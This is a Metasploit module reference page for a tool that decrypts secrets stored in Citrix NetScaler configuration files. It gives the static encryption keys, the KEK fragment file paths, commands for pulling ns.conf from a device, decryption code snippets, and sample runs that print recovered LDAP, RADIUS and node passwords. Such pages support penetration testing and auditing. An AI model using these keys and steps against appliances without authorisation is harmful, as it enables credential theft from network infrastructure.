Decrypt Citrix NetScaler Config Secrets - Metasploit
This page contains detailed information about how to use the auxiliary/admin/citrix/citrix_netscaler_config_decrypt metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Decrypt Citrix NetScaler Config Secrets
Module: auxiliary/admin/citrix/citrix_netscaler_config_decrypt
Source code: modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt.rb
Disclosure date: 2022-05-19
Last modification time: 2022-07-13 08:36:18 +0000
Supported architecture(s): -
Supported platform(s): BSD
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module takes a Citrix NetScaler ns.conf configuration file as input and extracts secrets that have been stored with reversible encryption. The module supports legacy NetScaler encryption (RC4) as well as the newer AES-256-ECB and AES-256-CBC encryption types. It is also possible to decrypt secrets protected by the Key Encryption Key (KEK) method, provided the key fragment files F1.key and F2.key are provided.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
Basic Usage
msf > use auxiliary/admin/citrix/citrix_netscaler_config_decrypt
msf auxiliary(citrix_netscaler_config_decrypt) > show targets
... a list of targets ...
msf auxiliary(citrix_netscaler_config_decrypt) > set TARGET target-id
msf auxiliary(citrix_netscaler_config_decrypt) > show options
... show and set options ...
msf auxiliary(citrix_netscaler_config_decrypt) > exploit
Required Options
- NS_CONF: Path to a NetScaler configuration file (ns.conf)
Knowledge Base
This module takes a Citrix NetScaler ns.conf configuration file as input and extracts secrets that
have been stored with reversible encryption. The module supports legacy NetScaler encryption (RC4)
as well as the newer AES-256-ECB and AES-256-CBC encryption types. It is also possible to decrypt
secrets protected by the Key Encryption Key (KEK) method, provided the key fragment files F1.key
and F2.key are provided. Currently, keys for appliances in FIPS mode or running hardware HSM cannot
be extracted. Root access to a NetScaler device or access to a NetScaler configuration backup are
the most effective means of acquiring the configuration file and key fragments.
This module incorporates research published by dozer:
https://dozer.nz/posts/citrix-decrypt/
Vulnerable Application
This module is tested against the configuration files for NetScaler versions 10.x, 11x, 12.x and 13.x. The module will work with files retrieved from a live NetScaler system as well as files extracted from an unencrypted NetScaler backup archive. This is possible because NetScaler uses well-known hard coded encryption keys which are visible on the system in the hidden file:
/nsconfig/.skf
These static keys are:
NetScaler RC4:
2286da6ca015bcd9b7259753c2a5fbc2
NetScaler AES:
351cbe38f041320f22d990ad8365889c7de2fcccae5a1a8707e21e4adccd4ad9
The module is also able to decrypt secrets encrypted with NetScaler KEK, provided the associated
F1.key and F2.key fragments are provided. Private key passphrases that use -passcrypt are not
currently decryptable by this module, but any secret that uses the -encrypted parameter should be
fully recoverable.
Verification Steps
You must possess a NetScaler ns.conf file in order to use this module. If the NetScaler is running
NS13.0 Build76.xx.nc or higher, or the administrator has configured KEK encryption, you must also
possess the associated KEK key fragments in order to decrypt the file. All files must be local to
the system invoking the module. Where possible, you should provide the NS_IP option to tag
relevant loot entries with the IPv4 address of the originating system. If no value is provided for
NS_IP the module defaults to assigning the loopback IP 127.0.0.1.
- Acquire the
ns.conffile, and associatedF1.keyandF2.keyfiles if using NS KEK - Start msfconsole
- Do:
modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt.rb - Do:
set ns_conf <path to ns.conf>to provide the location of the NetScaler config file - Do:
set ns_kek_f1 <path to f1.key>if you are decrypting a file using NS KEK - Do:
set ns_kek_f2 <path to f2.key>if you are decrypting a file using NS KEK - Do:
set ns_ip <NetScaler IPv4>to attach the target NetScaler IPv4 address to loot entries - Do:
dump
Options
NS_CONF
Path to the NetScaler configuration file on the local system. Example: /tmp/ns.conf
NS_KEK_F1
Path to the first of two NS KEK fragments, if decrypting NS KEK. Example: /tmp/F1.key
NS_KEK_F2
Path to the second of two NS KEK fragments, if decrypting NS KEK. Example: /tmp/F2.key
NS_IP
Optional parameter to set the IPv4 address associated with loot entries made by the module.
Scenarios
Acquire NetScaler Config File
NetScaler configuration files can be retrieved from a live system by running
show ns.conf
From the nscli or
cat /nsconfig/ns.conf
from the BSD shell. These files can also be retrieved from NetScaler configuration backup archives which are generated from the appliance admin interface.
Acquire KEK Fragment Files
As of NS13.0 Build76.xx.nc NetScaler requires mandatory use of the Key Encryption Key (KEK)
scheme. If secrets within the config file use KEK, you must also posses the associated KEK F1
and F2 fragment files in order to perform decryption. Secrets that require KEK fragments to
decrypt will include the -kek parameter on the associated configuration line. It is possible
for an admin to manually enable KEK in NS builds prior to Build76.xx.nc - if this has been done,
the current KEK key fragments are located in the following paths:
/nsconfig/F1.key
/nsconfig/F2.key
After NS13.0 Build76.xx.nc, KEK is mandatory and managed by the NetScaler itself. Key fragments
are presumably regenerated during firmware upgrades, and a journal is maintained in /nsconfig/keys
suffixed with a date stamp. The F1.key and F2.key files are ignored, and the new "current" KEK
key is stored in hidden files at paths:
/nsconfig/.F1.key
/nsconfig/.F2.key
As well as under /nsconfig/keys. Note that both fragments must be provided for successful
decryption. The module can be run without providing KEK fragments, but will be unable to decrypt
any secrets that use KEK encryption. An unencrypted NetScaler backup archive will contain all KEK
fragments currently defined on the appliance as well as the current ns.conf file.
Running the Module
Example run against config file without KEK from NetScaler VPX running NS11.0 Build 62.10.nc:
msf6 > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf.NS11.0-62.10.conf
ns_conf => /tmp/ns.conf.NS11.0-62.10.conf
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump
[] Config line:
add ssl certKey netscaler_cesium137_io -cert netscaler_cesium137_io.pem -key netscaler_cesium137_io.key -passcrypt "VbuAvo9nq18Zap0joBBv1a1Chm5BOerJ3GhYWU+Wbv0=" -expiryMonitor DISABLED
[!] Not decrypting passcrypt entry:
[!] Ciphertext: VbuAvo9nq18Zap0joBBv1a1Chm5BOerJ3GhYWU+Wbv0=
[] Config line:
set ns encryptionParams -method AES256 -keyValue 7654526a2f3ceffd877b286a8acece43da700d06133dc985f7ebdeb076135bcb755472e04f5d92aba9f07334eb8e936a58782ce76bb3f6d6e44adf727e8e88d602b8bdae1817d26203fe281a8429574d -encrypted -encryptmethod ENCMTHD_3
[+] Plaintext: AAAAAAXyju437Ecnb/iQpa55uUvOskx7S5hCq5dB4kMq+Lcx6g==
[] Config line:
add authentication radiusAction UTIL1 -serverIP 10.100.10.13 -serverPort 1812 -radKey f8e4f532e9d4e6bebab169b3be9e77b5c851466b7760c469bd64a15d2e8d3c602025c41372094d06e207789d58b6acb7 -encrypted -encryptmethod ENCMTHD_3
[+] Plaintext: hbZaADYDUmdHv7AhHsAb6eCde2M82m0
[] Config line:
add authentication ldapAction LDAP -serverName ldap.cesium137.io -serverPort 636 -ldapBase "DC=chainheart,DC=com" -ldapBindDn [email protected] -ldapBindDnPassword f5dc75680b925dbd3c0a8154c8fee056bfe77ac774797de3c0867d368bd09c2cdd872a36e15a1f07abf773740e2c8a12 -encrypted -encryptmethod ENCMTHD_3 -ldapLoginName sAMAccountName -groupAttrName memberOf -secType SSL -ldapHostname ldap.cesium137.io
[+] User: [email protected]
[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
[] Config line:
set ns rpcNode 10.100.10.11 -password 9ec84444b10941dc4222f93b29a75f0aa237ffdcc73a81355bf5d1cf3d80058daaad7ca58e488e54bc3ff3eea8ffd9eb -encrypted -encryptmethod ENCMTHD_3 -srcIP 10.100.10.11
[+] Plaintext: 447a325517739063bbaa414ecf1d9c3
[] Config line:
set ns rpcNode 10.100.10.12 -password dd5c0c4952509e2fcfaeb238dfc361b79a844df09254087920ee0cf4dc447161bde8491d8a39ded0fa2526cc46e6a00f -encrypted -encryptmethod ENCMTHD_3 -srcIP 10.100.10.11
[+] Plaintext: 447a325517739063bbaa414ecf1d9c3
[] Config line:
add lb monitor mon_ldaps LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password e209865546c3d2e8462e3e7a962252eb6d9e26374163c8d902fc3535cb12638c514765dcea4792eb1e3e6b5e1c1c4cef -encrypted -encryptmethod ENCMTHD_3 -LRTM DISABLED -secure YES -baseDN "DC=chainheart,DC=com" -bindDN [email protected] -filter CN=builtin
[+] User: [email protected]
[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
[] Config line:
add lb monitor mon_ldap LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password 4ae7bec92e25d985df315e543b846b2c30346840d8e945f5073832c3e479d60eee581f67d671759ae555210529eaec8d -encrypted -encryptmethod ENCMTHD_3 -LRTM DISABLED -destPort 636 -secure YES -baseDN "DC=chainheart,DC=com" -bindDN [email protected] -filter CN=builtin
[+] User: [email protected]
[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
[*] Auxiliary module execution completed
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) >
Example run against config file using KEK from NetScaler VPX running NS13.0 Build 85.15.nc:
msf6 > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf
ns_conf => /tmp/ns.conf
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f1 /tmp/F1.key
ns_kek_f1 => /tmp/F1.key
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f2 /tmp/F2.key
ns_kek_f2 => /tmp/F2.key
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump
[*] Building NetScaler KEK from key fragments ...
[+] NS KEK F1
[+] HEX: dd2588bb3cb20dd643216c33489776c78e8c56f13b1301e0984dc80564eea49e
[+] NS KEK F2
[+] HEX: 45f9e6780a1dc40b6fe75bedf2f6dbb9a86e4315d07313014fe2381c52e44d8f
[+] Assembled NS KEK AES key
[+] HEX: 54f202b9a94649fd9eaa3f13eab514a5a267f460db0a2393f8b25f321a7d79e0
[*] Config line:
add ssl certKey netscaler_cesium137_io -cert netscaler_cesium137_io.pem -key netscaler_cesium137_io.key 30f39257d8aacc737182568184e0d535002d90a7aba3454c1e8766a958d3a4a720e485c498adc681f0e7559ff633f932 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
[+] Plaintext: zgkEUD86rUv76coT0DkIBj1xlp5qEzH
[*] Config line:
add ssl certKey ldap_cesium137_io -cert ldap_cesium137_io.pem -key ldap_cesium137_io.key d7902778370c616480ef781c5b3922ef31bd90e75dd3aecfa0fa8a5bafc4fa16b20ed2f7a07970c3f4d8ba201a3b9b72 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor ENABLED -notificationPeriod 90
[+] Plaintext: YaqoRLtSnnMPgnWyhAedYv2RO1aVtx8
[*] Config line:
add ssl certKey mail_cesium137_io -cert mail_cesium137_io-g3.pem -key mail_cesium137_io-g3.key 0e5ca2011772a9943c8f4281668b7236a8dfb97da290487d1953fa5ef768272f33d20122b055878729c75c29efaa3291 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
[+] Plaintext: TBkrkfnP4QOWIT0FX8QCLl2GkNrnM
[*] Config line:
add ssl certKey auth_cesium137_io -cert auth_cesium137_io-g3.pem -key auth_cesium137_io-g3.key d574cca92065da27309ce87a423ac82e0c1571cd4c6df59a725f7eabee97d40136a250152506cb15962e34c90f1dc25c -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
[+] Plaintext: flEkB3SW4YTTi9HRNnffmvJLSgJhsz5
[*] Config line:
set ns encryptionParams -method AES256 -keyValue ec5d48485c6871d1d4a2b01f9126946c53aa49eae721c8114ba7a34a1b1f8eabd443a9d641bbf5ef67f2b0237c481673587846db5378f72f9025f0762f8f9cbeebf4a16aaa2782d5c6ecd90c48a1c30d -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35
[+] Plaintext: AAAAAAXyju437Ecnb/iQpa55uUvOskx7S5hCq5dB4kMq+Lcx6g==
[*] Config line:
add authentication radiusAction APP01_DUO -serverIP 10.100.10.13 -serverPort 11812 -authTimeout 60 -radKey 535587632ffe91f2559fcf5902c7e4bf24961ee2e7f6285c03c87c2e65165fbc -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -accounting ON
[+] Plaintext: IAmSam!
[*] Config line:
add authentication radiusAction APP01_DUO_CITRIXRECEIVER -serverIP 10.100.10.13 -serverPort 21812 -authTimeout 60 -radKey 6644f481004ac7dee5a05b5a8dc3d9d9ae8c76f5fe82e0430b43acd7fb5afe9c -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -accounting ON
[+] Plaintext: IAmSam!
[*] Config line:
add authentication ldapAction AD_DUA2FAUSERS -serverName ldap.cesium137.io -serverPort 636 -authTimeout 60 -ldapBase "DC=cesium137,DC=io" -ldapBindDn [email protected] -ldapBindDnPassword 7fbbf2ef9665641264406c17673c0cdb5774b76454f3ac8c7bb067dd0d2228c5 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -ldapLoginName sAMAccountName -searchFilter "&(objectCategory=user)(memberOf=CN=2FA-OWA,CN=Users,DC=cesium137,DC=io)" -groupAttrName memberOf -subAttributeName cn -secType SSL -passwdChange ENABLED -nestedGroupExtraction ON -groupNameIdentifier sAMAccountName -groupSearchAttribute memberOf -groupSearchSubAttribute CN
[+] User: [email protected]
[+] Pass: Gr33n3gg$
[*] Config line:
set ns rpcNode 192.168.10.14 -password 2634fa338c457cb32fdf245873874a9b8fcd7128f6534641f49ea650e9f0974b -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -srcIP 192.168.10.14
[+] Plaintext: SamIAm!
[*] Config line:
set ns rpcNode 192.168.10.15 -password 6955e686fc5dd3beee5013dad0e0fa6510a56029b52cc7d7ed15082a60ec6ce4 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -srcIP 192.168.10.14
[+] Plaintext: SamIAm!
[*] Config line:
add lb monitor mon_ldaps LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password cc1f6bb054f5d63d5eb871fdd36ff573f3343c1e0238965682460c6f084d1e14-encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -LRTM DISABLED -secure YES -baseDN "DC=cesium137,DC=io" -bindDN [email protected] -filter CN=builtin -devno 13862
[+] User: [email protected]
[+] Pass: Gr33n3gg$
[*] Config line:
add lb monitor mon_ldap LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password 5c35e0aa5c3d999e9ff10de1fa32910f9ac28b1ee8824c2301ac964e1f5f987e-encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -LRTM DISABLED -destPort 636 -secure YES -baseDN "DC=cesium137,DC=io" -bindDN [email protected] -filter CN=builtin -devno 13863
[+] User: [email protected]
[+] Pass: Gr33n3gg$
[*] Config line:
add lb monitor mon-radius RADIUS -respCode 2 -userName ldap -password fda3a1c5990558d4bfae059f27191f4c91a2dfa826d7318db287e109f5da39f9 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -LRTM DISABLED -resptimeout 4 -destPort 1812 -devno 13864
[+] User: ldap
[+] Pass: Gr33n3gg$
[*] Auxiliary module execution completed
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) >
Go back to menu.
Msfconsole Usage
Here is how the admin/citrix/citrix_netscaler_config_decrypt auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/citrix/citrix_netscaler_config_decrypt
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > show info
Name: Decrypt Citrix NetScaler Config Secrets
Module: auxiliary/admin/citrix/citrix_netscaler_config_decrypt
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2022-05-19
Provided by:
npm <[email protected]>
Module side effects:
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available actions:
Name Description
---- -----------
Dump Dump secrets from NetScaler configuration
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
NS_CONF yes Path to a NetScaler configuration file (ns.conf)
NS_IP no (Optional) IPv4 address to attach to loot
NS_KEK_F1 no Path to NetScaler KEK fragment file F1.key
NS_KEK_F2 no Path to NetScaler KEK fragment file F2.key
Description:
This module takes a Citrix NetScaler ns.conf configuration file as
input and extracts secrets that have been stored with reversible
encryption. The module supports legacy NetScaler encryption (RC4) as
well as the newer AES-256-ECB and AES-256-CBC encryption types. It
is also possible to decrypt secrets protected by the Key Encryption
Key (KEK) method, provided the key fragment files F1.key and F2.key
are provided.
References:
https://dozer.nz/posts/citrix-decrypt/
https://www.ferroquesystems.com/resource/citrix-adc-security-kek-files/
Module Options
This is a complete list of options available in the admin/citrix/citrix_netscaler_config_decrypt auxiliary module:
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > show options
Module options (auxiliary/admin/citrix/citrix_netscaler_config_decrypt):
Name Current Setting Required Description
---- --------------- -------- -----------
NS_CONF yes Path to a NetScaler configuration file (ns.conf)
NS_IP no (Optional) IPv4 address to attach to loot
NS_KEK_F1 no Path to NetScaler KEK fragment file F1.key
NS_KEK_F2 no Path to NetScaler KEK fragment file F2.key
Auxiliary action:
Name Description
---- -----------
Dump Dump secrets from NetScaler configuration
Advanced Options
Here is a complete list of advanced options supported by the admin/citrix/citrix_netscaler_config_decrypt auxiliary module:
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > show advanced
Module advanced options (auxiliary/admin/citrix/citrix_netscaler_config_decrypt):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/citrix/citrix_netscaler_config_decrypt module can do:
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > show actions
Auxiliary actions:
Name Description
---- -----------
Dump Dump secrets from NetScaler configuration
Evasion Options
Here is the full list of possible evasion options supported by the admin/citrix/citrix_netscaler_config_decrypt auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- KEK files must be 256 bytes in size
- Provided F1.key is not valid hexidecimal data
- NS_KEK_F1
- Provided F2.key is not valid hexidecimal data
- NS_KEK_F2
- Entry was encrypted with KEK but no KEK fragement files provided, decryption will not be possible
- Not decrypting passcrypt entry
- Ciphertext: <CIPHERTEXT_B64>
- <__METHOD__>: bad decrypt
- <__METHOD__>: bad decrypt
- <__METHOD__>: bad decrypt
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
KEK files must be 256 bytes in size
Here is a relevant code snippet related to the "KEK files must be 256 bytes in size" error message:
102: parse_ns_config
103: end
104:
105: def build_ns_kek
106: unless File.size(ns_kek_f1) == 256 && File.size(ns_kek_f2) == 256
107: print_error('KEK files must be 256 bytes in size')
108: return false
109: end
110: f1_hex = File.binread(ns_kek_f1)
111: f2_hex = File.binread(ns_kek_f2)
112: unless f1_hex.match?(/^[0-9a-f]+$/i)
Provided F1.key is not valid hexidecimal data
Here is a relevant code snippet related to the "Provided F1.key is not valid hexidecimal data" error message:
108: return false
109: end
110: f1_hex = File.binread(ns_kek_f1)
111: f2_hex = File.binread(ns_kek_f2)
112: unless f1_hex.match?(/^[0-9a-f]+$/i)
113: print_error('Provided F1.key is not valid hexidecimal data')
114: raise Msf::OptionValidateError, ['NS_KEK_F1']
115: end
116: unless f2_hex.match?(/^[0-9a-f]+$/i)
117: print_error('Provided F2.key is not valid hexidecimal data')
118: raise Msf::OptionValidateError, ['NS_KEK_F2']
NS_KEK_F1
Here is a relevant code snippet related to the "NS_KEK_F1" error message:
109: end
110: f1_hex = File.binread(ns_kek_f1)
111: f2_hex = File.binread(ns_kek_f2)
112: unless f1_hex.match?(/^[0-9a-f]+$/i)
113: print_error('Provided F1.key is not valid hexidecimal data')
114: raise Msf::OptionValidateError, ['NS_KEK_F1']
115: end
116: unless f2_hex.match?(/^[0-9a-f]+$/i)
117: print_error('Provided F2.key is not valid hexidecimal data')
118: raise Msf::OptionValidateError, ['NS_KEK_F2']
119: end
Provided F2.key is not valid hexidecimal data
Here is a relevant code snippet related to the "Provided F2.key is not valid hexidecimal data" error message:
112: unless f1_hex.match?(/^[0-9a-f]+$/i)
113: print_error('Provided F1.key is not valid hexidecimal data')
114: raise Msf::OptionValidateError, ['NS_KEK_F1']
115: end
116: unless f2_hex.match?(/^[0-9a-f]+$/i)
117: print_error('Provided F2.key is not valid hexidecimal data')
118: raise Msf::OptionValidateError, ['NS_KEK_F2']
119: end
120: f1_key = f1_hex[66..130].scan(/../).map(&:hex).pack('C*')
121: f2_key = f2_hex[70..134].scan(/../).map(&:hex).pack('C*')
122: f1_key_hex = f1_key.unpack('H*').first
NS_KEK_F2
Here is a relevant code snippet related to the "NS_KEK_F2" error message:
113: print_error('Provided F1.key is not valid hexidecimal data')
114: raise Msf::OptionValidateError, ['NS_KEK_F1']
115: end
116: unless f2_hex.match?(/^[0-9a-f]+$/i)
117: print_error('Provided F2.key is not valid hexidecimal data')
118: raise Msf::OptionValidateError, ['NS_KEK_F2']
119: end
120: f1_key = f1_hex[66..130].scan(/../).map(&:hex).pack('C*')
121: f2_key = f2_hex[70..134].scan(/../).map(&:hex).pack('C*')
122: f1_key_hex = f1_key.unpack('H*').first
123: f2_key_hex = f2_key.unpack('H*').first
Entry was encrypted with KEK but no KEK fragement files provided, decryption will not be possible
Here is a relevant code snippet related to the "Entry was encrypted with KEK but no KEK fragement files provided, decryption will not be possible" error message:
150: if config_entry.match?(/-kek/)
151: is_kek = true
152: end
153: print_status("Config line:\n#{config_entry}")
154: if is_kek && !@ns_kek_key
155: print_warning('Entry was encrypted with KEK but no KEK fragement files provided, decryption will not be possible')
156: next
157: end
158: username = parse_username_from_config(config_entry)
159: ciphertext.each do |encrypted|
160: encrypted_entry = encrypted.to_s
Not decrypting passcrypt entry
Here is a relevant code snippet related to the "Not decrypting passcrypt entry" error message:
162: ciphertext_bytes = encrypted_entry.scan(/../).map(&:hex).pack('C*')
163: else
164: ciphertext_b64 = encrypted_entry.split(' ')[1].delete('"')
165: # TODO: Implement -passcrypt functionality
166: # ciphertext_bytes = Base64.strict_decode64(ciphertext_b64)
167: print_warning('Not decrypting passcrypt entry:')
168: print_warning("Ciphertext: #{ciphertext_b64}")
169: next
170: end
171: case enc_type
172: when 'ENCMTHD_2' # aes-256-ecb
Ciphertext: <CIPHERTEXT_B64>
Here is a relevant code snippet related to the "Ciphertext: <CIPHERTEXT_B64>" error message:
163: else
164: ciphertext_b64 = encrypted_entry.split(' ')[1].delete('"')
165: # TODO: Implement -passcrypt functionality
166: # ciphertext_bytes = Base64.strict_decode64(ciphertext_b64)
167: print_warning('Not decrypting passcrypt entry:')
168: print_warning("Ciphertext: #{ciphertext_b64}")
169: next
170: end
171: case enc_type
172: when 'ENCMTHD_2' # aes-256-ecb
173: if is_kek
<__METHOD__>: bad decrypt
Here is a relevant code snippet related to the "<__METHOD__>: bad decrypt" error message:
221: decipher = OpenSSL::Cipher.new('rc4')
222: decipher.decrypt
223: decipher.key = rc4key
224: decipher.update(ciphertext_bytes)
225: rescue OpenSSL::Cipher::CipherError
226: print_error("#{__method__}: bad decrypt")
227: return false
228: end
229:
230: def ns_aes_ecb_decrypt(aeskey, ciphertext_bytes)
231: decipher = OpenSSL::Cipher.new('aes-256-ecb')
<__METHOD__>: bad decrypt
Here is a relevant code snippet related to the "<__METHOD__>: bad decrypt" error message:
232: decipher.decrypt
233: decipher.padding = 0
234: decipher.key = aeskey
235: (decipher.update(ciphertext_bytes) + decipher.final).delete("\000")
236: rescue OpenSSL::Cipher::CipherError
237: print_error("#{__method__}: bad decrypt")
238: return false
239: end
240:
241: def ns_aes_cbc_decrypt(aeskey, ciphertext_bytes)
242: decipher = OpenSSL::Cipher.new('aes-256-cbc')
<__METHOD__>: bad decrypt
Here is a relevant code snippet related to the "<__METHOD__>: bad decrypt" error message:
244: ciphertext = ciphertext_bytes[16..]
245: decipher.decrypt
246: decipher.iv = iv
247: decipher.padding = 1
248: decipher.key = aeskey
249: (decipher.update(ciphertext) + decipher.final).delete("\000")
250: rescue OpenSSL::Cipher::CipherError
251: print_error("#{__method__}: bad decrypt")
252: return false
253: end
254: end
Go back to menu.
Related Pull Requests
References
- CVE: Not available
- https://dozer.nz/posts/citrix-decrypt/
- https://www.ferroquesystems.com/resource/citrix-adc-security-kek-files/
See Also
Check also the following modules related to this module:
- auxiliary/gather/citrix_published_applications
- auxiliary/gather/citrix_published_bruteforce
- auxiliary/scanner/http/citrix_dir_traversal
- exploit/freebsd/http/citrix_dir_traversal_rce
- exploit/freebsd/misc/citrix_netscaler_soap_bof
- exploit/unix/webapp/citrix_access_gateway_exec
- exploit/windows/browser/citrix_gateway_actx
- exploit/windows/misc/citrix_streamprocess
- exploit/windows/misc/citrix_streamprocess_data_msg
- exploit/windows/misc/citrix_streamprocess_get_boot_record_request
- exploit/windows/misc/citrix_streamprocess_get_footer
- exploit/windows/misc/citrix_streamprocess_get_objects
- auxiliary/admin/misc/sercomm_dump_config
- auxiliary/admin/networking/arista_config
- auxiliary/admin/networking/brocade_config
- auxiliary/admin/networking/cisco_config
- auxiliary/admin/networking/f5_config
- auxiliary/admin/networking/juniper_config
- auxiliary/admin/networking/mikrotik_config
- auxiliary/admin/networking/ubiquiti_config
- auxiliary/admin/networking/vyos_config
- auxiliary/admin/sap/sap_configservlet_exec_noauth
- auxiliary/gather/cisco_pvc2300_download_config
- auxiliary/gather/cisco_rv320_config
- auxiliary/scanner/http/binom3_login_config_pass_dump
- auxiliary/scanner/http/epmp1000_dump_config
- auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration
- auxiliary/scanner/http/zenworks_assetmanagement_getconfig
- auxiliary/scanner/misc/dvr_config_disclosure
- auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles
- auxiliary/scanner/snmp/cisco_config_tftp
Authors
npm[at]cesium137.io
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
